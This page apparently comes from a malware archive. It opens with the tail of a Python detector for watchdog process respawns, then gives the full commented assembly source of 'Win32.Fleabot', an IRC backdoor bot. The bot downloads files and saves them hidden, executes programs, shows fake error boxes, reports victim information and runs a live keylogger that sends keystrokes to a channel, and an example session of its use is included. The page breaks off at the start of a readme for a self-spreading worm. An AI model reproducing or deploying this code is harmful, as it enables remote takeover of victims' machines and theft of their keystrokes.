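    {"EventID": 5, "UtcTime": DAY + "09:10:00.000", "Image": NOTEPAD, "ProcessId": 4000},
    {"EventID": 1, "UtcTime": DAY + "09:30:00.000", "Image": NOTEPAD, "ProcessId": 4010,
     "ParentImage": EXPLORER, "ParentProcessId": 1200},
]

if __name__ == "__main__":
    for finding in find_watchdog_respawns(SAMPLE_EVENTS):
        print(finding)
```

Because Explorer is the normal parent of user-launched programs, the parent alone proves nothing; the remote-thread event and the short exit-to-relaunch gap are what separate this behaviour from ordinary use.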

sources

Win32.Fleabot DiA ;Win32.Fleabot by DiA/RRLF ;DiA_hates_machine@gmx.de ;http://www.vx-dia.de.vu/ ; ;Description: ; This is a small and simple IRC bot coded in assembler (use FASM to assemble). I ; wanted to write a small tutorial along with this source, but I am lazy dude ;). ; But don't cry, the code is very well commented and easy to understand. The bot ; has 12 commands, wich you can see in the example session. For greets and fucks ; use my guestbook at vx-dia.de.vu or drop me some mail to DiA_hates_machine@gmx.de ; Now have fun with this little code, assembled just 8kb baby. ; ;------- example session start------------------------------------------------------ ;[10:52] * Now talking in #test ;[10:53] <DiAbolicx> ^^raw mode #test +o DiAbolicx ;[10:53] <workwqbz> bot is locked, use unlock <password> ;[10:53] <DiAbolicx> ^^unlock test ;[10:53] <workwqbz> bot now unlocked ;[10:53] <DiAbolicx> ^^raw mode #test +o DiAbolicx ;[10:53] * workwqbz sets mode: +o DiAbolicx ;[10:53] <DiAbolicx> ^^cmds ;[10:53] <workwqbz> unlock <password> - unlock the bot ;[10:53] <workwqbz> lock - lock the bot ;[10:53] <workwqbz> raw <irc command> - send irc command to server ;[10:53] <workwqbz> dl <http url> | <save as path> - download file from http ;[10:53] <workwqbz> exec <path> - execute a application ;[10:53] <workwqbz> msgbox <title> | <message> - show fake error message ;[10:53] <workwqbz> info - get username, system directory and is admin ;[10:53] <workwqbz> livelog - start logging keys and send it to channel ;[10:53] <workwqbz> stoplog - stop logging keys ;[10:53] <workwqbz> cmds - show available commands ;[10:53] <workwqbz> version - show bot version ;[10:53] <workwqbz> quit - quit bot ;[10:53] <DiAbolicx> ^^raw privmsg #test :yes, i am here ;[10:53] <workwqbz> yes, i am here ;[10:56] <DiAbolicx> ^^dl http://127.0.0.1/calc.exe | D:\calcx.exe ;[10:56] <workwqbz> download successful ;[10:56] <DiAbolicx> ^^exec D:\calcx.exe ;[10:57] <workwqbz> successful executed ;[10:57] 
<DiAbolicx> ^^msgbox Fleabot | Test message, dude ;[10:57] <workwqbz> message box closed by user ;[10:57] <DiAbolicx> ^^info ;[10:57] <workwqbz> Username: Work, System directory: C:\WINDOWS\system32, Admin: No ;[10:58] <DiAbolicx> ^^version ;[10:58] <workwqbz> Fleabot - a example IRC bot in asm ;[10:58] <DiAbolicx> ^^livelog ;[10:58] <workwqbz> live keylogging thread created ;[10:58] <workwqbz> {crlf}THIS IS A TEST I TYPE THIS IN MY EDITOR AND ;[10:58] <workwqbz> KEYS ARE REDIRECTED TO THE PREDEFINED IRC CHANNEL{crlf} ;[10:58] <DiAbolicx> ^^stoplog ;[10:58] <workwqbz> keylogging thread terminated ;[10:59] <DiAbolicx> ^^quit ;[10:59] * workwqbz (~workwqbz@dianet.org) Quit (workwqbz) ;------- example session end-------------------------------------------------------- include "%fasminc%\win32ax.inc" ;equates, api's and macros making living easier entry Bot ;define code start IRCServer equ "127.0.0.1", 0 ;to this server we want to connect IRCPort equ 6667d ;connect using this port Channel equ "#test", 0 ;channel name ChannelPassword equ "test", 0 ;the channel password CommandPrefix equ "^^" ;what indicate commands BotPassword equ "test", 0 ;bot password CRLF equ 10d, 13d ;break section '.data' data readable writeable ;here our datas will be stored Version db "Fleabot - a example IRC bot in asm", 0 ;identify bot version IsLocked db 0d ;to check if bot is locked or not WSAData WSADATA ;used by WSAStartup, cleanup SocketDesc dd ? ;socket descriptor is stored here SockAddr dw AF_INET ;our sockaddr_in structure SockAddr_Port dw ? ;here we save the port SockAddr_IP dd ? 
;here we save the ip SockAddr_Zero rb 8d ;unused RandomString rb 5d ;here we save a random string (a - z) for the nick Username rb 36d ;here we store the user name for nick generation UsernameSize dd 36d ;size of the buffer Nickname rb 9d ;buffer for nickname SendBuffer rb 512d ;the buffer where we store bytes to send ReturnBuffer rb 512d ;the buffer where we story things to receive ByteBuffer rb 2d ;for the RecvLine procedure Pong db "PONG " ;prefix pong message PongBuffer rb 16d ;buffer for the pong message CommandBuffer rb 128d ;buffer to store command and parameters Parameter1 rb 128d ;buffer for parameter 1 Parameter2 rb 128d ;buffer for parameter 2 InetHandle dd ? ;handle for download command UrlHandle dd ? ;handle for download command FileHandle dd ? ;handle of open files ReadNext dd ? ;how much else to download DownloadBuffer rb 1024d ;downoad kb for kb BytesWritten dd ? ;for writefile StartupInfo STARTUPINFO ;for create process ProcessInfo PROCESS_INFORMATION ;for create process SystemDir rb 256d ;buffer for system dir ThreadId dd ? ;for creating live keylog thread ThreadHandle dd ? ;store handle for thread ThreadExitCode dd ? ;for terminating thread KeylogBuffer rb 60d ;buffer for key strokes section '.code' code readable executable ;code section Bot: ;lets start invoke WSAStartup,\ ;initiates sockets DLL 0101h,\ ;use version 1.1 WSAData ;pointer to wsadata strcuture cmp eax, 0 ;successful? jne Exit ;if not exit bot invoke socket,\ ;create a socket AF_INET,\ ;family SOCK_STREAM,\ ;two way connection 0 ;no particular protocol cmp eax, -1 ;successful? 
je Exit ;if not exit mov dword [SocketDesc], eax ;save socket descriptor invoke inet_addr,\ ;covert ip string to dword IRCServer ;the ip as string mov dword [SockAddr_IP], eax ;save ip in sockaddr structure invoke htons,\ ;convert port to the network byte order IRCPort ;the port mov word [SockAddr_Port], ax ;save it in the structure invoke connect,\ ;now connect to server dword [SocketDesc],\ ;the socket descriptor SockAddr,\ ;pointer to the sockaddr structure 16d ;size of this structure cmp eax, 0 ;successful? jne Exit ;if not exit call GenerateNickname ;generate the nickname invoke lstrcpy,\ ;copy NICK to send buffer SendBuffer,\ ;pointer "NICK " ;nick command invoke lstrcat,\ ;append the nickname SendBuffer,\ ;to this Nickname ;from this call SendLine ;send buffer to irc server invoke lstrcpy,\ ;copy USER to send buffer SendBuffer,\ ;to this "USER " ;from this invoke lstrcat,\ ;append the nickname SendBuffer,\ ;to this Nickname ;from this invoke lstrcat,\ ;append usermode SendBuffer,\ ;to this " 8 * :" ;usermode invoke lstrcat,\ ;append nickname for user message SendBuffer,\ ;to this Nickname ;from this call SendLine ;send buffer to server GetMotd: ;we can join when "MOTD" message is over call RecvLine ;get a line from server call HandlePing ;handle ping mov ecx, 0 ;clear counter IsMotd: ;check for "MOTD" cmp dword [ReturnBuffer + ecx], "MOTD" ;is there "MOTD"? je HaveMotd ;then we can join cmp byte [ReturnBuffer + ecx], 0d ;end of buffer? 
je GetMotd ;check next line inc ecx ;ecx + 1 jmp IsMotd ;check next position HaveMotd: ;now we can join invoke lstrcpy,\ ;copy JOIN to buffer SendBuffer,\ ;pointer "JOIN " ;join command invoke lstrcat,\ ;append the channel SendBuffer,\ ;pointer Channel ;channel name invoke lstrcat,\ ;append a space SendBuffer,\ ;pointer " " ;space invoke lstrcat,\ ;append the channel password SendBuffer,\ ;pointer ChannelPassword ;pass call SendLine ;send to server invoke lstrcpy,\ ;copy MODE to buffer SendBuffer,\ ;pointer "MODE " ;to set key invoke lstrcat,\ ;append channel SendBuffer,\ ;pointer Channel ;channel name invoke lstrcat,\ ;append key mode and secret SendBuffer,\ ;buffer " +nsk " ;no external message, secret, key invoke lstrcat,\ ;append the password aka key SendBuffer,\ ;pointer ChannelPassword ;the pass call SendLine ;send it to irc server RecvCommand: ;check if received line include a command call RecvLine ;get a line call HandlePing ;handle ping if it is mov ecx, 0 ;set counter to zero IsCommand: ;check if command cmp word [ReturnBuffer + ecx], CommandPrefix ;is command prefix? je HaveCommand ;then extract command cmp byte [ReturnBuffer + ecx], 0 ;is end of line? 
je RecvCommand ;then wait for next inc ecx ;increase counter by one jmp IsCommand ;check next position HaveCommand: ;extract command mov ebx, ReturnBuffer ;pointer to buffer add ebx, ecx ;add counter add ebx, 2d ;add length of command prefix invoke lstrcpy,\ ;add to command buffer CommandBuffer,\ ;pointer ebx ;points to command position call ExecuteCommand ;execute command jmp RecvCommand ;next command Exit: invoke WSACleanup ;cleanup the wsa invoke ExitProcess,\ ;exit program 0 ;exit code SendLine: ;this procedure sends a line to the irc server invoke lstrcat,\ ;append crlf to the send buffer SendBuffer,\ ;buffer CRLF ;10d, 13d invoke lstrlen,\ ;get length of buffer SendBuffer ;buffer invoke send,\ ;send this line dword [SocketDesc],\ ;socket descriptor SendBuffer,\ ;send this eax,\ ;length of buffer 0 ;no flags cmp eax, -1 ;succeddful? je Exit ;if not exit ret ;return to call RecvLine: ;this procedure receive a line from server mov dword [ReturnBuffer], 0 ;clear the buffer GetLine: ;recv until crlf invoke recv,\ ;receive a byte dword [SocketDesc],\ ;socket descriptor ByteBuffer,\ ;1 byte buffer 1d,\ ;get just one byte 0 ;no flags cmp eax, 0 ;error? je Exit ;if so, exit cmp byte [ByteBuffer], 10d ;arrived crlf? je HaveLine ;then return invoke lstrcat,\ ;append byte to buffer ReturnBuffer,\ ;pointer ByteBuffer ;the byte jmp GetLine ;receive next byte HaveLine: ;we have a line and can.. ret ;...return GenerateNickname: ;this procedure generates a random nick mov ecx, 0 ;clear counter GetByte: ;get a single byte invoke GetTickCount ;get the run time cmp al, 97d ;after "a" jnb CheckBelow ;if so, check if its before "z" jmp Sleep33 ;sleep 33 ms CheckBelow: cmp al, 122d ;before "z" jna HaveByte ;then save byte jmp Sleep33 ;sleep 33 ms HaveByte: ;save a byte mov byte [RandomString + ecx], al ;save byte at the position inc ecx ;ecx + 1 cmp ecx, 4d ;got 4 bytes? 
je GenerateIt ;now generate it Sleep33: ;sleep 33ms and try again to get a byte a - z push ecx ;push counter invoke Sleep,\ ;sleep 33d ;33ms pop ecx ;restore counter jmp GetByte ;try to get a byte a -z GenerateIt: ;have random string, now create nick invoke GetUserName,\ ;get the logged on user name Username,\ ;pointer to buffer UsernameSize ;size of buffer cmp eax, 0 ;successful? jne ExtractUserName ;if so jump there mov dword [Username], "rrlf" ;no user name got, fill it with text anyways ExtractUserName: ;get 4 bytes from the user name mov byte [Username + 4d], 0 ;set string end at 5th position invoke lstrcpy,\ ;copy username to nick buffer Nickname,\ ;pointer to buffer Username ;pointer to buffer invoke lstrcat,\ ;append random string Nickname,\ ;to this RandomString ;from this invoke CharLowerBuff,\ ;now mae nick to lower Nickname,\ ;the nick 8d ;length ret ;return to call HandlePing: ;this procedure handle ping and pong cmp dword [ReturnBuffer], "PING" ;is a ping? jne NoPing ;if not return invoke lstrcpy,\ ;copy ping message to buffer PongBuffer,\ ;to this ReturnBuffer + 6d ;sendbuffer + "PING " invoke lstrcpy,\ ;copy PONG message to sendbuffer SendBuffer,\ ;buffer Pong ;pong message call SendLine ;send pong NoPing: ;its not a ping ret ;return SendPrivmsg: ;send a message to channel invoke lstrcpy,\ ;copy PRIVMSG to send buffer SendBuffer,\ ;pointer "PRIVMSG " ;irc command invoke lstrcat,\ ;append channel SendBuffer,\ ;pointer Channel ;the chan invoke lstrcat,\ ;append space SendBuffer,\ ;pointer " :" ;sepertor invoke lstrcat,\ ;append message SendBuffer,\ ;pointer ReturnBuffer ;pointer call SendLine ;send to server ret ;return ExecuteCommand: ;execute received command cmp dword [CommandBuffer], "unlo" ;is unlock command? je CmdUnlock ;execute it cmp byte [IsLocked], 0 ;is bot locked? je BotLocked ;jmp there cmp dword [CommandBuffer], "cmds" ;is commands command? je CmdCmds ;then show commands cmp dword [CommandBuffer], "lock" ;is lock command? 
je CmdLock ;lock it then cmp dword [CommandBuffer], "quit" ;is quit command? je CmdQuit ;quit from irc, exit cmp dword [CommandBuffer], "raw " ;is raw command? je CmdRaw ;execute raw irc command cmp word [CommandBuffer], "dl" ;is download command? je CmdDl ;download file from http cmp dword [CommandBuffer], "exec" ;is execute command? je CmdExec ;then execute application cmp dword [CommandBuffer], "vers" ;is version command? je CmdVersion ;show it then cmp dword [CommandBuffer], "msgb" ;is msgbox command? je CmdMsgbox ;show it then cmp dword [CommandBuffer], "info" ;is info command? je CmdInfo ;then show informations about victim cmp dword [CommandBuffer], "live" ;is livelog command? je CmdLivelog ;log it then cmp dword [CommandBuffer], "stop" ;is stoplog command? je CmdStoplog ;stop it then invoke lstrcpy,\ ;unknown command ReturnBuffer,\ ;pointer "unknown command, type 'cmds' for commands" ;mesage call SendPrivmsg ;send to chan jmp ExecuteCommandReturn ;return BotLocked: invoke lstrcpy,\ ;copy locked message to return buffer ReturnBuffer,\ ;pointer "bot is locked, use unlock <password>" ;message call SendPrivmsg ;send it jmp ExecuteCommandReturn ;return CmdUnlock: ;unlock command invoke lstrlen,\ ;get password len BotPassword ;of this inc eax ;eax + 1 invoke lstrcpyn,\ ;copy password to parameter1 buffer Parameter1,\ ;pointer CommandBuffer + 7d,\ ;skip "unlock " eax ;dont copy the crlf invoke lstrcmp,\ ;compare password BotPassword,\ ;password Parameter1 ;received password cmp eax, 0 ;right pass? 
jne WrongPassword ;if not send back wrong pass mov byte [IsLocked], 1d ;set unlock code invoke lstrcpy,\ ;tell user bot is unlocked ReturnBuffer,\ ;buffer "bot now unlocked" ;message call SendPrivmsg ;send to channel jmp ExecuteCommandReturn ;return WrongPassword: invoke lstrcpy,\ ;copy wrong pass message ReturnBuffer,\ ;pointer "wrong password" ;message call SendPrivmsg ;send to chan jmp ExecuteCommandReturn ;return CmdCmds: ;show all comands invoke lstrcpy,\ ;copy unlock command ReturnBuffer,\ ;pointer to buffer "unlock <password> - unlock the bot" ;message call SendPrivmsg ;send it to channel invoke Sleep,\ ;sleep a second 1000d ;1 sec invoke lstrcpy,\ ;copy lock command ReturnBuffer,\ ;pointer to buffer "lock - lock the bot" ;message call SendPrivmsg ;send it to channel invoke Sleep,\ ;sleep a second 1000d ;1 sec invoke lstrcpy,\ ;copy raw command ReturnBuffer,\ ;pointer to buffer "raw <irc command> - send irc command to server" ;message call SendPrivmsg ;send it to channel invoke Sleep,\ ;sleep a second 1000d ;1 sec invoke lstrcpy,\ ;copy dl command ReturnBuffer,\ ;pointer to buffer "dl <http url> | <save as path> - download file from http" ;message call SendPrivmsg ;send it to channel invoke Sleep,\ ;sleep a second 1000d ;1 sec invoke lstrcpy,\ ;copy exec command ReturnBuffer,\ ;pointer to buffer "exec <path> - execute a application" ;message call SendPrivmsg ;send it to channel invoke Sleep,\ ;sleep a second 1000d ;1 sec invoke lstrcpy,\ ;copy msgbox command ReturnBuffer,\ ;pointer to buffer "msgbox <title> | <message> - show fake error message" ;message call SendPrivmsg ;send it to channel invoke Sleep,\ ;sleep a second 1000d ;1 sec invoke lstrcpy,\ ;copy info command ReturnBuffer,\ ;pointer to buffer "info - get username, system directory and is admin" ;message call SendPrivmsg ;send it to channel invoke Sleep,\ ;sleep a second 1000d ;1 sec invoke lstrcpy,\ ;copy livelog command ReturnBuffer,\ ;pointer to buffer "livelog - start logging keys and send it to 
channel" ;message call SendPrivmsg ;send it to channel invoke Sleep,\ ;sleep a second 1000d ;1 sec invoke lstrcpy,\ ;copy stoplog command ReturnBuffer,\ ;pointer to buffer "stoplog - stop logging keys" ;message call SendPrivmsg ;send it to channel invoke Sleep,\ ;sleep a second 1000d ;1 sec invoke lstrcpy,\ ;copy cmds command ReturnBuffer,\ ;pointer to buffer "cmds - show available commands" ;message call SendPrivmsg ;send it to channel invoke lstrcpy,\ ;copy version command ReturnBuffer,\ ;pointer to buffer "version - show bot version" ;message call SendPrivmsg ;send it to channel invoke Sleep,\ ;sleep a second 1000d ;1 sec invoke lstrcpy,\ ;copy quit command ReturnBuffer,\ ;pointer to buffer "quit - quit bot" ;message call SendPrivmsg ;send it to channel invoke Sleep,\ ;sleep a second 1000d ;1 sec jmp ExecuteCommandReturn ;return CmdLock: ;lock command mov byte [IsLocked], 0 ;set it as locked invoke lstrcpy,\ ;return message ReturnBuffer,\ ;buffer "bot now locked" ;message call SendPrivmsg ;send it jmp ExecuteCommandReturn ;and return CmdQuit: ;quit bot invoke lstrcpy,\ ;copy QUIT to buffer SendBuffer,\ ;pointer "QUIT" ;quit command call SendLine ;send it invoke Sleep,\ ;sleep 2000d ;2 seconds jmp Exit ;exit bot CmdRaw: ;send raw command to irc server invoke lstrcpy,\ ;copy command to buffer SendBuffer,\ ;buffer CommandBuffer + 4 ;skip "raw " call SendLine ;send it jmp ExecuteCommandReturn ;return CmdDl: ;download file via http call ExtractParameters ;get the two parameters invoke InternetOpen,\ ;initialise wininet Parameter1,\ ;use url as agent, not necessary 0,\ ;get configs from registry (INTERNET_OPEN_TYPE_PRECONFIG) 0,\ ;no proxy 0,\ ;also no bypass 0 ;no flags cmp eax, 0 ;error? 
je DownloadFileError ;if so jump to error mov dword [InetHandle], eax ;save handle invoke InternetOpenUrl,\ ;open the http url dword [InetHandle],\ ;handle from internetopen Parameter1 + 3,\ ;pointer to the url, pass "dl " 0,\ ;no need for headers 0,\ ;so are the length 0,\ ;no specific flags 0 ;no context needed cmp eax, 0 ;error? je DownloadFileError ;then show error mov dword [UrlHandle], eax ;save handle invoke CreateFile,\ ;create the file for writing Parameter2,\ ;pointer to filename GENERIC_WRITE,\ ;we just want to write FILE_SHARE_WRITE,\ ;write it 0,\ ;security attributes, nohh CREATE_NEW,\ ;fail if file exist FILE_ATTRIBUTE_HIDDEN,\ ;make it as hidden 0 ;no template file cmp eax, 0 ;error? je DownloadFileError ;send error back mov dword [FileHandle], eax ;save handle inc dword [ReadNext] ;increase readnext by one ReadNextBytes: ;read bytes by bytes cmp dword [ReadNext], 0 ;no more to read je DownloadComplete ;then download complete invoke InternetReadFile,\ ;read from the open url dword [UrlHandle],\ ;open handle DownloadBuffer,\ ;pointer to buffer 1024d,\ ;bytes to read, kbyte by kbyte ReadNext ;how much bytes readed? 
invoke WriteFile,\ ;write bytes to file dword [FileHandle],\ ;open handle DownloadBuffer,\ ;point to downloaded bytes dword [ReadNext],\ ;write that much bytes BytesWritten,\ ;how much bytes are written 0 ;no overlapped jmp ReadNextBytes ;process next bytes DownloadComplete: ;download is complete invoke CloseHandle,\ ;close file dword [FileHandle] ;via handle invoke InternetCloseHandle,\ ;close inet dword [UrlHandle] ;via handle invoke InternetCloseHandle,\ ;again dword [InetHandle] ;via handle invoke lstrcpy,\ ;copy success message ReturnBuffer,\ ;to return buffer "download successful" ;message call SendPrivmsg ;send to channel jmp ExecuteCommandReturn ;return DownloadFileError: invoke lstrcpy,\ ;copy fail message ReturnBuffer,\ ;to return buffer "download failed" ;message call SendPrivmsg ;send to channel jmp ExecuteCommandReturn ;return CmdExec: ;execute a file invoke lstrlen,\ ;get length of buffer CommandBuffer ;of this mov byte [CommandBuffer + eax - 1], 0 ;clear the crlf invoke CreateProcess,\ ;via create process CommandBuffer + 5d,\ ;application, skip "exec " CommandBuffer + 5d,\ ;user 0,\ ;no process attributes 0,\ ;no thread attributes 0,\ ;no inerhits CREATE_NEW_CONSOLE,\ ;own process 0,\ ;no environment 0,\ ;nor current directory StartupInfo,\ ;startup structure ProcessInfo ;process structure cmp eax, 0 ;error? 
je ExecError ;show it then invoke lstrcpy,\ ;copy message ReturnBuffer,\ ;to this "successful executed" ;yehaw call SendPrivmsg ;send to chan jmp ExecuteCommandReturn ;return ExecError: ;error occured invoke lstrcpy,\ ;copy message ReturnBuffer,\ ;to this "execution failed" ;damn call SendPrivmsg ;send to chan jmp ExecuteCommandReturn ;return CmdVersion: ;show bot version invoke lstrcpy,\ ;copy version to buffer ReturnBuffer,\ ;pointer Version ;from version call SendPrivmsg ;send to channel jmp ExecuteCommandReturn ;return CmdMsgbox: ;show a error message box call ExtractParameters ;get two parameters invoke MessageBox,\ ;show messagbox, local 0,\ ;no owner Parameter2,\ ;Text Parameter1 + 7d,\ ;title, skip "msgbox " MB_ICONERROR ;error style invoke lstrcpy,\ ;copy message ReturnBuffer,\ ;pointer "message box closed by user" ;message call SendPrivmsg ;send to channeö jmp ExecuteCommandReturn ;return CmdInfo: ;show informations invoke lstrcpy,\ ;copy "Username" to buffer ReturnBuffer,\ ;pointer "Username: " ;msg invoke GetUserName,\ ;get user name Username,\ ;buffer UsernameSize ;size invoke lstrcat,\ ;copy username ReturnBuffer,\ ;buffer Username ;pointer invoke lstrcat,\ ;copy "sysdir" ReturnBuffer,\ ;to buffer ", System directory: " ;msg invoke GetSystemDirectory,\ ;get sys dir to test SystemDir,\ ;buffer 256d ;size invoke lstrcat,\ ;copy to buffer ReturnBuffer,\ ;to buffer SystemDir ;from here invoke lstrcat,\ ;append "admin" ReturnBuffer,\ ;buffer ", Admin: " invoke lstrcat,\ ;append filename to system dir SystemDir,\ ;to buffer "DiA.RRLF" ;filename ;) invoke CreateFile,\ ;try to create this file SystemDir,\ ;file in system directory GENERIC_WRITE,\ ;check write FILE_SHARE_WRITE,\ ;yeh 0,\ ;no security attributes CREATE_ALWAYS,\ ;overwrite if exist FILE_ATTRIBUTE_HIDDEN,\ ;as hidden 0 ;no template file cmp eax, -1 ;error? 
je NoAdmin ;then user is no admin invoke lstrcat,\ ;copy "yes" ReturnBuffer,\ ;to buffer "Yes" ;message call SendPrivmsg ;send to channel jmp ExecuteCommandReturn ;and return NoAdmin: ;user is no admin invoke lstrcat,\ ;copy "no" ReturnBuffer,\ ;to buffer "No" ;message call SendPrivmsg ;send to channel jmp ExecuteCommandReturn ;and return CmdLivelog: ;create a thread for live keylogging invoke CreateThread,\ ;create the keylog thread 0,\ ;no security attributes 0,\ ;default stack size LiveKeylog,\ ;procedure start 0,\ ;no parameters 0,\ ;start right now ThreadId ;store here the thread id cmp eax, 0 ;error? je ThreadError ;then jump there mov dword [ThreadHandle], eax ;store thread handle invoke lstrcpy,\ ;copy success message ReturnBuffer,\ ;to the buffer "live keylogging thread created" ;yehaw call SendPrivmsg ;send to channel jmp ExecuteCommandReturn ;ret ThreadError: invoke lstrcpy,\ ;copy error message ReturnBuffer,\ ;to this "error on creating live keylogging thread" ;buh call SendPrivmsg ;send it jmp ExecuteCommandReturn ;return CmdStoplog: ;stop keylogging thread invoke GetExitCodeThread,\ ;get exit code to terminate thread dword [ThreadHandle],\ ;thread handle ThreadExitCode ;store it here invoke TerminateThread,\ ;exit it now dword [ThreadHandle],\ ;handle dword [ThreadExitCode] ;with this cmp eax, 0 ;error? 
je ExitThreadError ;show it then mov dword [ThreadId], 0 ;clear id mov dword [ThreadHandle], 0 ;clear handle mov dword [ThreadExitCode], 0 ;clear exit code invoke lstrcpy,\ ;copy sucess message ReturnBuffer,\ ;to buffer "keylogging thread terminated" ;msg call SendPrivmsg ;send it jmp ExecuteCommandReturn ;ret ExitThreadError: ;arghh, maybe not exist invoke lstrcpy,\ ;copy error message ReturnBuffer,\ ;to buffer "error terminating keylogging thread" ;msg call SendPrivmsg ;send it jmp ExecuteCommandReturn ;ret ExecuteCommandReturn: ;return ret ;return to call ExtractParameters: ;this procedure extracts two parameter from a cmd mov edx, CommandBuffer ;pointer to buffer mov ecx, 0 ;zero counter FindCut: ;get the "|" cur cmp byte [edx + ecx], "|" ;is byte at position a "|"? je HaveCut ;then extract it inc ecx ;counter + 1 jmp FindCut ;scan next position HaveCut: ;have cut, extract it add edx, ecx ;add counter to start of buffer mov byte [edx - 1], 0 ;zero the "|" add edx, 2d ;skip space invoke lstrcpy,\ ;copy parameter2 Parameter2,\ ;destination edx ;source invoke lstrlen,\ ;get length to erase crlf Parameter2 ;of buffer mov byte [Parameter2 + eax - 1], 0 ;erase crlf invoke lstrcpy,\ ;copy parameter1 Parameter1,\ ;buffer CommandBuffer ;source ret ;return to call LiveKeylog: ;this procedure logs keys and send it to channel invoke lstrlen,\ ;get legth of buffer KeylogBuffer ;key strokes buffer cmp eax, 50d ;is over 50 characters? jae SendKeyLine ;then send it to channel mov ebx, 0 ;set counter to zero (just use ebx because api dont change it NextKey: ;try if next key is pressed cmp ebx, 255d ;end of possible keys? je LiveKeylog ;the try from start again invoke GetAsyncKeyState,\ ;get status of this key ebx ;in ebx (0 - 255) cmp eax, -32767d ;is pressed? 
jne ScanNextKey ;if not check next possible key cmp ebx, 20h ;VK_SPACE je IsSpace ;if it is this key, jump there cmp ebx, 8h ;VK_BACK je IsBack ;if it is this key, jump there cmp ebx, 9h ;VK_TAB je IsTab ;if it is this key, jump there cmp ebx, 60h ;VK_NUMPAD0 je IsNumpad0 ;if it is this key, jump there cmp ebx, 61h ;VK_NUMPAD1 je IsNumpad1 ;if it is this key, jump there cmp ebx, 62h ;VK_NUMPAD2 je IsNumpad2 ;if it is this key, jump there cmp ebx, 63h ;VK_NUMPAD3 je IsNumpad3 ;if it is this key, jump there cmp ebx, 64h ;VK_NUMPAD4 je IsNumpad4 ;if it is this key, jump there cmp ebx, 65h ;VK_NUMPAD5 je IsNumpad5 ;if it is this key, jump there cmp ebx, 66h ;VK_NUMPAD6 je IsNumpad6 ;if it is this key, jump there cmp ebx, 67h ;VK_NUMPAD7 je IsNumpad7 ;if it is this key, jump there cmp ebx, 68h ;VK_NUMPAD8 je IsNumpad8 ;if it is this key, jump there cmp ebx, 69h ;VK_NUMPAD9 je IsNumpad9 ;if it is this key, jump there cmp ebx, 0Dh ;VK_RETURN je IsReturn ;if it is this key, jump there cmp ebx, 30h ;VK_0 jae CheckIsKey ;if its above "1" its possible key ScanNextKey: ;check next key if its pressed inc ebx ;increase counter by one jmp NextKey ;check it baby CheckIsKey: cmp ebx, 5Ah ;VK_Z jbe IsKey ;is key from 1 - Z jmp ScanNextKey ;nop, scan next one IsSpace: ;cat other key to buffer invoke lstrcat,\ KeylogBuffer,\ " " jmp LiveKeylog IsBack: ;cat other key to buffer invoke lstrcat,\ KeylogBuffer,\ "{back}" jmp LiveKeylog IsTab: ;cat other key to buffer invoke lstrcat,\ KeylogBuffer,\ "{tab}" jmp LiveKeylog IsNumpad0: ;cat other key to buffer invoke lstrcat,\ KeylogBuffer,\ "0" jmp LiveKeylog IsNumpad1: ;cat other key to buffer invoke lstrcat,\ KeylogBuffer,\ "1" jmp LiveKeylog IsNumpad2: ;cat other key to buffer invoke lstrcat,\ KeylogBuffer,\ "2" jmp LiveKeylog IsNumpad3: ;cat other key to buffer invoke lstrcat,\ KeylogBuffer,\ "3" jmp LiveKeylog IsNumpad4: ;cat other key to buffer invoke lstrcat,\ KeylogBuffer,\ "4" jmp LiveKeylog IsNumpad5: ;cat other key to buffer invoke 
lstrcat,\ KeylogBuffer,\ "5" jmp LiveKeylog IsNumpad6: ;cat other key to buffer invoke lstrcat,\ KeylogBuffer,\ "6" jmp LiveKeylog IsNumpad7: ;cat other key to buffer invoke lstrcat,\ KeylogBuffer,\ "7" jmp LiveKeylog IsNumpad8: ;cat other key to buffer invoke lstrcat,\ KeylogBuffer,\ "8" jmp LiveKeylog IsNumpad9: ;cat other key to buffer invoke lstrcat,\ KeylogBuffer,\ "9" jmp LiveKeylog IsReturn: ;cat other key to buffer invoke lstrcat,\ KeylogBuffer,\ "{crlf}" jmp LiveKeylog IsKey: ;cat key to buffer mov dword [ByteBuffer], ebx ;key is in ebx invoke lstrcat,\ ;append it to the keylog buffer KeylogBuffer,\ ;to this ByteBuffer ;the logged key jmp LiveKeylog ;log next key SendKeyLine: invoke lstrcpy,\ ;send complete line to channel SendBuffer,\ ;copy to send buffer "PRIVMSG " ;irc command invoke lstrcat,\ ;append channel SendBuffer,\ ;to buffer Channel ;this invoke lstrcat,\ ;cat : SendBuffer,\ ;to buffer " :" ;guess invoke lstrcat,\ ;append logged buffer SendBuffer,\ ;to send buffer KeylogBuffer ;from here call SendLine ;send line to irc server mov dword [KeylogBuffer], 0 ;empty buffer jmp LiveKeylog ;log next ret ;return to call section '.idata' import data readable writeable ;imports library kernel, "kernel32.dll",\ winsock, "ws2_32.dll",\ user, "user32.dll",\ advapi, "advapi32.dll",\ wininet, "wininet.dll" import kernel,\ lstrcpy, "lstrcpyA",\ lstrcpyn, "lstrcpynA",\ lstrcat, "lstrcatA",\ lstrcmp, "lstrcmpA",\ lstrlen, "lstrlenA",\ GetTickCount, "GetTickCount",\ Sleep, "Sleep",\ CreateFile, "CreateFileA",\ WriteFile, "WriteFile",\ CloseHandle, "CloseHandle",\ CreateProcess, "CreateProcessA",\ CreateThread, "CreateThread",\ GetExitCodeThread, "GetExitCodeThread",\ TerminateThread, "TerminateThread",\ GetSystemDirectory, "GetSystemDirectoryA",\ ExitProcess, "ExitProcess" import winsock,\ WSAStartup, "WSAStartup",\ socket, "socket",\ inet_addr, "inet_addr",\ htons, "htons",\ connect, "connect",\ recv, "recv",\ send, "send",\ WSACleanup, "WSACleanup" import 
advapi,\ GetUserName, "GetUserNameA" import user,\ CharLowerBuff, "CharLowerBuffA",\ MessageBox, "MessageBoxA",\ GetAsyncKeyState, "GetAsyncKeyState" import wininet,\ InternetOpen, "InternetOpenA",\ InternetOpenUrl, "InternetOpenUrlA",\ InternetReadFile, "InternetReadFile",\ InternetCloseHandle, "InternetCloseHandle"

sources

Tamiami Worm 1.3 DiA

____________________________________________________________________________________________
\\                                                                                        //
//                                                                                        \\
\\                                    Tamiami Worm                                        //
//                                    Version 1.3                                         \\
\\                                      coded by                                          //
//                                        DiA                                             \\
\\                          Ready Rangers Liberation Front                                //
//                  DiA_hates_machine@gmx.de - http://www.vx-dia.de.vu/                   \\
\\                                                                                        //
//________________________________________________________________________________________\\

// Disclaimer
I am not responsible for anything that you do with this source. So take care when you want
to test this or parts of this code. If you don't know how to handle malware, please close
this for your and others pleasure.

// Intro
Welcome to my best and biggest creation. It spreads via several ways, which I describe
here. Also it has some nice features, and still more to come. When you look at the source
code, you will see that some functions are not used. That's because I decided that simpler
